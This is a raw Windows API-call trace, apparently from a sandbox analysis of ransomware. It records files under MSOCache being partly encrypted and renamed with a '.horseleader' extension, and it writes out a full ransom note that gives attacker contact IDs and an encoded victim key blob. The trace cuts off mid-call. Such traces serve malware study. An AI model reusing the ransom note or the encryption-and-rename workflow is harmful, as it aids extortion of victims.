lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0209.410] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 66 [0209.410] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0209.410] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0209.410] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0209.410] GetProcessHeap () returned 0x780000 [0209.410] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0209.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned 68 [0209.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0209.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0209.413] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0209.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0209.413] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0209.413] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0209.413] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0209.413] lstrlenW (lpString=".testttjffg") returned 11 [0209.413] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0209.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.413] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.413] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0209.414] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0209.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0209.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0209.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0209.414] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0209.414] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0209.414] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0209.414] lstrlenW (lpString=".testttjffg") returned 11 [0209.414] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0209.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.414] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="1033", cAlternateFileName="")) returned 1 [0209.414] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0209.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033") returned 71 [0209.414] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0209.415] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0209.415] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0209.415] GetProcessHeap () returned 0x780000 [0209.415] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.415] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*") returned 73 [0209.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0209.416] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.") returned 73 [0209.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0209.416] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="..", cAlternateFileName="")) returned 1 [0209.416] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\..") returned 74 [0209.416] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0209.416] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0209.416] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0209.416] lstrcmpiW (lpString1="dwintl20.dll", lpString2="Windows") returned -1 [0209.416] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0209.416] StrStrIW (lpFirst="dwintl20.dll", lpSrch=".horseleader") returned 0x0 [0209.416] lstrcmpW (lpString1="dwintl20.dll", lpString2="#Decrypt#.txt") returned 1 [0209.417] lstrcmpW (lpString1="dwintl20.dll", lpString2="_uninstalling_.png") returned 1 [0209.417] lstrlenW (lpString=".testttjffg") returned 11 [0209.417] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpSrch=".testttjffg") returned 0x0 [0209.417] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0209.417] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0209.417] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0209.417] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 84 [0209.417] StrStrW (lpFirst="dwintl20.dll", lpSrch=".txt") returned 0x0 [0209.417] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=107912) returned 1 [0209.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.417] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.421] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xaac4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.421] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.543] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.544] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.544] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0209.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.544] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0209.545] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0209.545] CloseHandle (hObject=0x158) returned 1 [0209.545] GetProcessHeap () returned 0x780000 [0209.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0209.545] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.horseleader") returned 96 [0209.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.horseleader")) returned 1 [0209.546] GetProcessHeap () returned 0x780000 [0209.546] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0209.546] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x68d44c19, dwReserved1=0x884f57f4, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0209.546] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0209.547] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\#Decrypt#.txt") returned 85 [0209.547] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.547] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0209.547] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0209.548] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0209.548] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0209.549] CloseHandle (hObject=0x21c) returned 1 [0209.549] GetProcessHeap () returned 0x780000 [0209.549] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.549] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0209.549] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0209.549] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0209.549] StrStrIW (lpFirst="branding.xml", lpSrch=".horseleader") returned 0x0 [0209.549] lstrcmpW (lpString1="branding.xml", lpString2="#Decrypt#.txt") returned 1 [0209.549] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0209.549] lstrlenW (lpString=".testttjffg") returned 11 [0209.549] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpSrch=".testttjffg") returned 0x0 [0209.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.550] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0209.551] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0209.552] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=596341) returned 1 [0209.552] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.552] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.556] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.556] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.556] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.556] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.076] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.076] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.077] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.105] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0210.105] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0210.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 